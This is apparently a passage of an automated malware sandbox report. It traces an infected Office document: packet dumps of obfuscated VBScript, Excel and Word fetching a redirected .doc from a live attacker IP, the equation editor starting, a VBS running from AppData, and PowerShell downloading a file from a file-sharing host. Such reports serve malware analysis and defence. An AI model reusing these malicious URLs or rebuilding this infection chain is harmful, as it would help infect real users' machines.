                                                                      Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 57 00 4c 00 4c 00 50 00 51 00 42 00 4b 00 5a 00 52 00 66 00 55 00 57 00 4c 00 52 00 6b 00 20 00 3d 00 20 00 22 00 4f 00 4a 00 65 00 7a 00 75 00 57 00 7a 00 78 00 4c 00 69 00 7a 00 62 00 68 00 4e 00 61 00 22 00 0d 00 0a 00 57 00 72 00 4c 00 57 00 47 00 65 00 4b 00 63 00 71 00 66 00 6c 00 75 00 4b 00 74 00 78 00 20 00 3d 00 20 00 22 00 57 00 57 00 6b 00 70 00 4b 00 70 00 41 00 4c 00 69 00 69 00 75 00 64 00 47 00 65 00 57 00 22 00 0d 00 0a 00 7a 00 4b 00 54 00 6b 00 4b 00 69 00 6c 00 68 00 4f 00 74 00 70 00 6c 00 65 00 52 00 41 00 20 00 3d 00 20 00 22 00 55 00 47 00 47 00 74 00 4b 00 73 00 4e 00 69 00 47 00 78 00 75 00 4c 00 42 00 57 00 49 00 22 00 0d 00 0a 00 69 00 68 00 65 00 6e 00 6c 00 63 00 65 00 4b 00 4c 00 4c 00 4c 00 68 00 6a 00 41 00 76 00 20 00 3d 00 20 00 22 00 73 00 57 00 4c 00 71 00 69 00 63 00 4c 00 43 00 4b 00 50 00 47 00 50 00 4e 00 69 00 6e 00 22 00 0d 00 0a 00 4c 00 70 00 63 00 4c 00 68 00 43 00 6d 00 6e 00 62 00 57 00 4b 00 50 00 4c 00 4c 00 4b 00 20 00 [TRUNCATED]
                                                                      Data Ascii: WLLPQBKZRfUWLRk = "OJezuWzxLizbhNa"WrLWGeKcqfluKtx = "WWkpKpALiiudGeW"zKTkKilhOtpleRA = "UGGtKsNiGxuLBWI"ihenlceKLLLhjAv = "sWLqicLCKPGPNin"LpcLhCmnbWKPLLK = "IKnpKfLmNufLrfB"BUpzWWNzpdWLUPL = "GLfLldNaLZGlULd"iKUOCjKoKLbepKL = "pLWWoGJixSuUGnP"zmzeOGcRchAxBmt = "fZBdcLOnnioczaG"cWWtUCaIkUifKAW = "fpkLhWZhSPKiOKb"iKsLUenmikCiAhU = "BZxkTGUTeSWiHfT"fBOiubBKctBGcUL = "PTfAiNlZhNATUgA"PbqOupazKKZAKZr = "huLlklWGSLWAZaJ"KoqNccjm
                                                                      Nov 27, 2024 17:56:25.440022945 CET224INData Raw: 00 6c 00 55 00 5a 00 53 00 6b 00 4b 00 42 00 20 00 3d 00 20 00 22 00 55 00 47 00 5a 00 57 00 75 00 4b 00 62 00 6f 00 6f 00 4f 00 63 00 57 00 5a 00 65 00 72 00 22 00 0d 00 0a 00 55 00 61 00 62 00 6b 00 4b 00 7a 00 63 00 4c 00 55 00 5a 00 4c 00 4f
                                                                      Data Ascii: lUZSkKB = "UGZWuKbooOcWZer"UabkKzcLUZLOBZG = "KudLAchAHcuKbWO"xtcZKNjlpKRtWcL = "gjUBoKLnlPkOUzq"GkNePiRGt
                                                                      Nov 27, 2024 17:56:25.440035105 CET1236INData Raw: 00 63 00 55 00 55 00 75 00 62 00 74 00 20 00 3d 00 20 00 22 00 7a 00 5a 00 69 00 78 00 57 00 78 00 4c 00 6f 00 57 00 68 00 6b 00 43 00 75 00 6c 00 6b 00 22 00 0d 00 0a 00 55 00 69 00 55 00 67 00 42 00 4c 00 6b 00 41 00 67 00 66 00 7a 00 57 00 4c
                                                                      Data Ascii: cUUubt = "zZixWxLoWhkCulk"UiUgBLkAgfzWLjO = "fsuiKKCLQWiczkf"QARJWGGLZkWzGPK = "BLSiRpOufZGvBWL"RGibfcnNWiexOol = "
                                                                      Nov 27, 2024 17:56:25.440069914 CET1236INData Raw: 00 7a 00 61 00 41 00 6c 00 71 00 6b 00 4a 00 69 00 6a 00 50 00 22 00 0d 00 0a 00 5a 00 63 00 6b 00 4b 00 49 00 63 00 6b 00 70 00 64 00 72 00 4b 00 6e 00 4b 00 42 00 4e 00 20 00 3d 00 20 00 22 00 66 00 4e 00 52 00 52 00 63 00 7a 00 6d 00 55 00 4e
                                                                      Data Ascii: zaAlqkJijP"ZckKIckpdrKnKBN = "fNRRczmUNpZzphN"uWKWhCLZTtWGBoe = "CnJLoWkdPLIWzPe"kiKriWKLlWeZfCl = "tLTAkLGPLPGRBdK
                                                                      Nov 27, 2024 17:56:25.440085888 CET1236INData Raw: 00 4b 00 4c 00 47 00 48 00 63 00 62 00 75 00 43 00 70 00 50 00 6a 00 20 00 3d 00 20 00 22 00 4c 00 65 00 5a 00 65 00 69 00 4e 00 43 00 62 00 64 00 63 00 4c 00 6d 00 70 00 63 00 4c 00 22 00 0d 00 0a 00 4b 00 4c 00 42 00 64 00 5a 00 41 00 4a 00 4f
                                                                      Data Ascii: KLGHcbuCpPj = "LeZeiNCbdcLmpcL"KLBdZAJOKWebecU = "JQJfKhAkldRPmLb"aRIWUNHApbLcfLC = "PtOmWSLgfZLiWWW"PdKuhBrUfsoO
                                                                      Nov 27, 2024 17:56:25.440099001 CET1236INData Raw: 00 4b 00 52 00 57 00 20 00 3d 00 20 00 22 00 73 00 4a 00 5a 00 4f 00 67 00 4c 00 65 00 62 00 65 00 4c 00 4c 00 70 00 57 00 68 00 6e 00 22 00 0d 00 0a 00 65 00 66 00 47 00 6b 00 4c 00 57 00 65 00 43 00 62 00 41 00 6b 00 55 00 6d 00 4e 00 55 00 20
                                                                      Data Ascii: KRW = "sJZOgLebeLLpWhn"efGkLWeCbAkUmNU = "GcAmUKKWbktPLKb"LniLAWhAUGWqmcd = "LtKmccbWzPKCLcJ"utckLfBTRWZkGao = "Kpi
                                                                      Nov 27, 2024 17:56:25.440109968 CET1236INData Raw: 00 47 00 42 00 5a 00 57 00 72 00 68 00 78 00 22 00 0d 00 0a 00 62 00 4c 00 6c 00 74 00 55 00 63 00 6f 00 62 00 66 00 57 00 63 00 68 00 63 00 42 00 71 00 20 00 3d 00 20 00 22 00 57 00 50 00 63 00 66 00 63 00 55 00 69 00 71 00 69 00 70 00 78 00 68
                                                                      Data Ascii: GBZWrhx"bLltUcobfWchcBq = "WPcfcUiqipxhcin"WLUUiLfrcWbcZfA = "fhdUKPNZceNWZfs"RLWGzLKxikkhihd = "WztbGPOAcjirinP"
                                                                      Nov 27, 2024 17:56:25.440485954 CET1236INData Raw: 00 50 00 20 00 3d 00 20 00 22 00 6e 00 50 00 4f 00 4b 00 6c 00 66 00 72 00 75 00 51 00 78 00 69 00 68 00 5a 00 69 00 71 00 22 00 0d 00 0a 00 4e 00 55 00 41 00 4c 00 6d 00 75 00 69 00 48 00 57 00 57 00 48 00 57 00 70 00 6b 00 49 00 20 00 3d 00 20
                                                                      Data Ascii: P = "nPOKlfruQxihZiq"NUALmuiHWWHWpkI = "OLtBimLoNKihGGK"JlJOnZphKLWKnAc = "uBcsAfcoClzWcCb"aOLTLHtbvTpfPLW = "LxN
                                                                      Nov 27, 2024 17:56:25.440505028 CET1236INData Raw: 00 0a 00 6d 00 4c 00 57 00 47 00 5a 00 43 00 6f 00 6d 00 55 00 6d 00 48 00 4b 00 47 00 57 00 6b 00 20 00 3d 00 20 00 22 00 67 00 57 00 41 00 70 00 65 00 65 00 4a 00 69 00 47 00 4b 00 57 00 53 00 41 00 71 00 47 00 22 00 0d 00 0a 00 57 00 50 00 4f
                                                                      Data Ascii: mLWGZComUmHKGWk = "gWApeeJiGKWSAqG"WPOiAtiWppWkWRn = "cRLUNSKpassanitodCjPWf"dKmGCKUfdTdTdtL = "NPohLUtNkWLKzdW"Op
                                                                      Nov 27, 2024 17:56:25.440515995 CET1236INData Raw: 00 6f 00 65 00 66 00 4c 00 6f 00 4e 00 6b 00 55 00 20 00 3d 00 20 00 22 00 47 00 70 00 70 00 78 00 50 00 6a 00 7a 00 50 00 6f 00 4b 00 4f 00 5a 00 69 00 66 00 4c 00 22 00 0d 00 0a 00 5a 00 57 00 68 00 6b 00 4b 00 49 00 64 00 6f 00 74 00 4b 00 74
                                                                      Data Ascii: oefLoNkU = "GppxPjzPoKOZifL"ZWhkKIdotKtlaTL = "mQWULGdLdWkNWTB"jNeGCWmuikmWNWz = "phAxieGRsKUOWPi"WKznLmOLthWnLuZ =
                                                                      Nov 27, 2024 17:56:25.560549021 CET1236INData Raw: 00 6b 00 6b 00 76 00 66 00 69 00 57 00 61 00 57 00 4b 00 55 00 22 00 0d 00 0a 00 52 00 68 00 55 00 42 00 57 00 4c 00 69 00 4f 00 6a 00 67 00 78 00 4b 00 74 00 6b 00 48 00 20 00 3d 00 20 00 22 00 72 00 51 00 4b 00 62 00 6b 00 4c 00 6f 00 41 00 4c
                                                                      Data Ascii: kkvfiWaWKU"RhUBWLiOjgxKtkH = "rQKbkLoALcAiiud"ogiRLLpCnLlqgKW = "sjsKCGWdGjoziOW"bhzikiLbkZLiCrg = "WiecvcGAPkLLLdK


                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.2249165152.231.102.1074433208C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-27 16:55:59 UTC404OUTGET /mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange&slice HTTP/1.1
                                                                      Accept: */*
                                                                      UA-CPU: AMD64
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Host: ljg.cl
                                                                      Connection: Keep-Alive
                                                                      2024-11-27 16:55:59 UTC695INHTTP/1.1 302 Found
                                                                      Server: openresty
                                                                      Date: Wed, 27 Nov 2024 16:55:59 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 235
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 0
                                                                      Location: http://23.95.128.215/43/hu/seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestofluckthignsaregoodnadsage.doc
                                                                      Vary: Accept
                                                                      Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                      X-Served-By: ljg.cl
                                                                      2024-11-27 16:55:59 UTC235INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 31 32 38 2e 32 31 35 2f 34 33 2f 68 75 2f 73 65 65 6d 79 62 65 73 74 6d 61 67 69 63 61 6c 74 68 69 6e 67 73 65 6e 69 74 65 72 77 6f 72 6c 64 77 68 63 69 68 67 69 76 65 6e 62 65 73 74 68 69 6e 67 73 65 6e 74 65 72 69 65 74 69 6d 65 67 69 76 65 6e 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 67 69 76 65 6d 62 65 73 74 74 68 69 6e 67 73 77 68 69 63 68 69 72 65 61 6c 6c 79 66 65 6c 6c 74 6f 64 6f 62 65 73 74 74 68 69 6e 67 73 77 68 69 63 68 69 72 65 61 6c 6c 79 6e 65 64 64 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 62 65 73 74 6f 66 6c 75 63 6b 74 68 69 67 6e 73 61 72 65 67 6f 6f 64 6e 61 64 73 61 67 65 2e 64 6f 63
                                                                      Data Ascii: Found. Redirecting to http://23.95.128.215/43/hu/seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestofluckthignsaregoodnadsage.doc


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.2249167152.231.102.1074433472C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-27 16:56:04 UTC128OUTOPTIONS / HTTP/1.1
                                                                      User-Agent: Microsoft Office Protocol Discovery
                                                                      Host: ljg.cl
                                                                      Content-Length: 0
                                                                      Connection: Keep-Alive
                                                                      2024-11-27 16:56:04 UTC520INHTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Wed, 27 Nov 2024 16:56:04 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 8
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Allow: GET,HEAD
                                                                      ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                                      Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                      X-Served-By: ljg.cl
                                                                      2024-11-27 16:56:04 UTC8INData Raw: 47 45 54 2c 48 45 41 44
                                                                      Data Ascii: GET,HEAD


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.2249168152.231.102.1074433472C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-27 16:56:06 UTC198OUTHEAD /mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange&slice HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                      Host: ljg.cl
                                                                      2024-11-27 16:56:07 UTC707INHTTP/1.1 302 Found
                                                                      Server: openresty
                                                                      Date: Wed, 27 Nov 2024 16:56:07 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 235
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Location: http://23.95.128.215/43/hu/seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestofluckthignsaregoodnadsage.doc
                                                                      Vary: Accept
                                                                      Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                      X-Served-By: ljg.cl


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      3192.168.2.2249169152.231.102.107443
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-27 16:56:12 UTC123OUTOPTIONS / HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                      translate: f
                                                                      Host: ljg.cl
                                                                      2024-11-27 16:56:13 UTC520INHTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Wed, 27 Nov 2024 16:56:13 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 8
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Allow: GET,HEAD
                                                                      ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                                      Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                      X-Served-By: ljg.cl
                                                                      2024-11-27 16:56:13 UTC8INData Raw: 47 45 54 2c 48 45 41 44
                                                                      Data Ascii: GET,HEAD


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      4192.168.2.2249170152.231.102.107443
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-27 16:56:15 UTC153OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6c 6a 67 2e 63 6c 0d 0a 0d 0a
                                                                      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: ljg.cl
                                                                      2024-11-27 16:56:16 UTC495INHTTP/1.1 404 Not Found
                                                                      Server: openresty
                                                                      Date: Wed, 27 Nov 2024 16:56:16 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 144
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Content-Security-Policy: default-src 'none'
                                                                      Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                      2024-11-27 16:56:16 UTC144INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      5192.168.2.2249171152.231.102.107443
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-27 16:56:18 UTC153OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6c 6a 67 2e 63 6c 0d 0a 0d 0a
                                                                      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: ljg.cl
                                                                      2024-11-27 16:56:18 UTC495INHTTP/1.1 404 Not Found
                                                                      Server: openresty
                                                                      Date: Wed, 27 Nov 2024 16:56:18 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 144
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Content-Security-Policy: default-src 'none'
                                                                      Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                      2024-11-27 16:56:18 UTC144INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.2249172152.231.102.1074433472C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-27 16:56:20 UTC217OUTHEAD /mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange&slice HTTP/1.1
                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                      Host: ljg.cl
                                                                      Content-Length: 0
                                                                      Connection: Keep-Alive
                                                                      2024-11-27 16:56:21 UTC707INHTTP/1.1 302 Found
                                                                      Server: openresty
                                                                      Date: Wed, 27 Nov 2024 16:56:20 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 235
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Location: http://23.95.128.215/43/hu/seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestofluckthignsaregoodnadsage.doc
                                                                      Vary: Accept
                                                                      Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                      X-Served-By: ljg.cl


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.2249175193.30.119.2054434024C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-27 16:56:32 UTC211OUTGET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1
                                                                      Host: 3105.filemail.com
                                                                      Connection: Keep-Alive
                                                                      2024-11-27 16:56:32 UTC234INHTTP/1.1 500 Internal Server Error
                                                                      Cache-Control: no-cache,no-store
                                                                      Pragma: no-cache
                                                                      Transfer-Encoding: chunked
                                                                      Content-Type: application/json; charset=utf-8
                                                                      Expires: -1
                                                                      Date: Wed, 27 Nov 2024 16:56:30 GMT
                                                                      Connection: close
                                                                      2024-11-27 16:56:32 UTC307INData Raw: 31 32 63 0d 0a 7b 22 76 61 6c 69 64 61 74 69 6f 6e 65 72 72 6f 72 73 22 3a 5b 7b 22 50 72 6f 70 65 72 74 79 4e 61 6d 65 22 3a 22 74 72 61 6e 73 66 65 72 69 64 22 2c 22 45 72 72 6f 72 43 6f 64 65 22 3a 22 54 72 61 6e 73 66 65 72 45 78 70 69 72 65 64 22 2c 22 45 72 72 6f 72 4d 65 73 73 61 67 65 22 3a 22 54 68 69 73 20 74 72 61 6e 73 66 65 72 20 69 73 20 65 78 70 69 72 65 64 22 7d 5d 2c 22 72 65 73 70 6f 6e 73 65 73 74 61 74 75 73 22 3a 22 54 72 61 6e 73 66 65 72 45 78 70 69 72 65 64 22 2c 22 65 72 72 6f 72 69 64 22 3a 22 34 32 32 62 63 33 62 37 2d 62 36 34 30 2d 34 39 35 35 2d 38 32 61 35 2d 36 65 65 61 62 34 39 65 30 39 61 30 22 2c 22 65 72 72 6f 72 6d 65 73 73 61 67 65 22 3a 22 74 72 61 6e 73 66 65 72 69 64 20 2d 2d 3e 20 5b 54 72 61 6e 73 66 65 72 45 78
                                                                      Data Ascii: 12c{"validationerrors":[{"PropertyName":"transferid","ErrorCode":"TransferExpired","ErrorMessage":"This transfer is expired"}],"responsestatus":"TransferExpired","errorid":"422bc3b7-b640-4955-82a5-6eeab49e09a0","errormessage":"transferid --> [TransferEx
                                                                      2024-11-27 16:56:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:11:55:36
                                                                      Start date:27/11/2024
                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                      Imagebase:0x13fdb0000
                                                                      File size:28'253'536 bytes
                                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:3
                                                                      Start time:11:56:00
                                                                      Start date:27/11/2024
                                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                                                      Imagebase:0x13f150000
                                                                      File size:1'423'704 bytes
                                                                      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:9
                                                                      Start time:11:56:21
                                                                      Start date:27/11/2024
                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                      Imagebase:0x400000
                                                                      File size:543'304 bytes
                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:11:56:25
                                                                      Start date:27/11/2024
                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs"
                                                                      Imagebase:0x930000
                                                                      File size:141'824 bytes
                                                                      MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:11
                                                                      Start time:11:56:25
                                                                      Start date:27/11/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
